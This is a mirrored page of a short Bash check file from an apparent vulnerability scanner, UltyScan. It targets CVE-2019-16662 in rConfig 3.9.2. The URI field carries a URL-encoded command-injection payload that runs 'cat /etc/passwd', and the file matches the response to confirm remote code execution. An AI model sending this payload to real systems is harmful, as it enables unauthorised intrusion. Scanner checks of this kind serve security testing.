mirror of
https://github.com/DeNNiiInc/UltyScan.git
synced 2026-04-17 18:26:00 +00:00
9 lines
345 B
Bash
9 lines
345 B
Bash
AUTHOR='@xer0dayz'
|
|
VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution'
|
|
URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23'
|
|
METHOD='GET'
|
|
MATCH="root:*:"
|
|
SEVERITY='P1 - CRITICAL'
|
|
CURL_OPTS='--user-agent "" -s -L --insecure'
|
|
SECONDARY_COMMANDS=''
|
|
GREP_OPTIONS='-i' |